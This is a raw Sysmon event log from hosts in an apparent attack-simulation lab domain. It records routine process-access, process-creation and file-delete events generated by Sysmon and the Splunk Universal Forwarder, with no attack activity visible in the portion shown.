09:11:27.152{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978738Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978737Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978736Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978735Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978734Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978733Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978732Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978731Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978730Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8ABF-6151-C279-00000000FD01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978729Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.152{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8ABF-6151-C279-00000000FD01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978728Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.138{69CF5F33-8ABF-6151-C279-00000000FD01}2848C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978727Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.136{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=651221526F7D2F6DAEE7B6F64CC0A6CC,SHA256=F353A9EE46DBCEB2757D4F73AABFDD3B850312FBEC38D0AF890CF91721339AE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978726Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:27.089{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CC9390DD5B2436ACFEF6AD636669481,SHA256=510C5F03409542D547D4B0EC5E924DD1FD5CE849583A7D34E028576C3F3F305D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:27.036{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C17EFCAF81C1C9D10315552E9FF974E3,SHA256=3F8EDFC05BFA6500D321FDBACC4074429F789D229CEA64488E750D4FC72FDAEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978769Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8AC0-6151-C479-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978768Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978767Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978766Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978765Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978764Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978763Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978762Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978761Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978760Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978759Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8AC0-6151-C479-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978758Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.527{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8AC0-6151-C479-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978757Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:28.512{69CF5F33-8AC0-6151-C479-00000000FD01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 